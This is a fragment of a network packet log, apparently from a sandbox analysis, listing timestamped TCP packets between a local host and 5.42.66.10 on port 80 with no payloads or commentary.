May 6, 2024 07:53:04.783399105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783406019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783411026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783422947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783430099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783435106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783446074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783452988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783458948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783469915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783471107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783483028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783488035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783494949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783507109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783512115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783539057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783552885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783579111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783591986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783603907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783613920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783616066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783627033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783627987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783648014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783662081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783704042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783718109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783727884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783740044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783744097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783751965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783760071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783763885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783775091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783802986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783830881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783843040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783853054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783864975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783869982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783876896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783888102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783895969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783920050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783946991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783968925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783982038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783991098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784003019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784009933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784018993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784027100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784029961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784041882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784050941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784054995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784080029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784111023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784137011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784147978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784158945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784169912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784178019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784182072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784187078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784193993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784208059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784240007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784240007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784323931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784334898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784346104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784358978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784358978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784370899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784384012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784385920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784396887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784409046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784410000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784420013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784423113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784431934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784446001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784455061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784457922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784470081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784482002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784495115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784519911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784589052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784600973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784612894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784625053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784626961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784636021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784642935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784650087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784655094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784662962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784673929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784686089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784687042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784697056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784703016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784709930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784729958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784732103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784740925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784753084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784780025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784789085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784800053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784811020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784821987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784825087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784832954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784846067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784848928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784857988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784869909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784878016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784883022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784888983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784909010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784933090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784934044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784946918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784957886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784969091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784970999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784980059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.784981966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.784996033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785006046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785007954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785020113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785028934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785031080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785043955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785051107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785056114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785068035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785075903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785079956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785090923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785095930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785104036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785108089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785115957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785126925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785137892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785137892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785140991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785152912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785165071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785166979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785181999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785181999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785200119 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785216093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785221100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785221100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785228968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785239935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785250902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785259008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785263062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785267115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785274029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785285950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785290003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785298109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785300016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785310030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785320044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785320044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785320044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785324097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785335064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785342932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785342932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785372019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785375118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785387039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785398006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785398006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785409927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785412073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785422087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785423994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785433054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785442114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785444021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785456896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785465956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785468102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785479069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785480976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785491943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785505056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785523891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785531998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785537004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785547972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785558939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785559893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785569906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785581112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785584927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785593987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785605907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785609961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785618067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785621881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785629034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785640001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785650969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785653114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785664082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785670042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785676003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785685062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785687923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785700083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785711050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785712004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785722971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785732985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785734892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785743952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785746098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785758018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785769939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785769939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785795927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785806894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785819054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785830975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785840988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785852909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785856962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785864115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785871029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785876036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785887957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785888910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785902023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785911083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785914898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785924911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785927057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785948038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785972118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.785979986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.785991907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786003113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786015034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786016941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786026001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786030054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786034107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786043882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786046028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786056995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786066055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786081076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786096096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786133051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786144972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786155939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786168098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786169052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786179066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786185980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786191940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786194086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786205053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786216021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786222935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786228895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786240101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786250114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786251068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786262989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786271095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786274910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786287069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786288977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786299944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786312103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786315918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786322117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786334991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786334991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786346912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786355019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786360025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786375999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786386013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786386013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786391973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786402941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786413908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786416054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786426067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786437988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786439896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786448002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786459923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786463022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786472082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786474943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786485910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786499023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786510944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786515951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786515951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786524057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786535978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786539078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786549091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786559105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786561966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786570072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786581039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786587000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786592960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786597967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786603928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786616087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786626101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786628008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786638975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786649942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786652088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786660910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786662102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786674023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786688089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786688089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786700964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786712885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786712885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.786725998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.786731005 CEST	49741	80	192.168.2.4	5.42.66.10
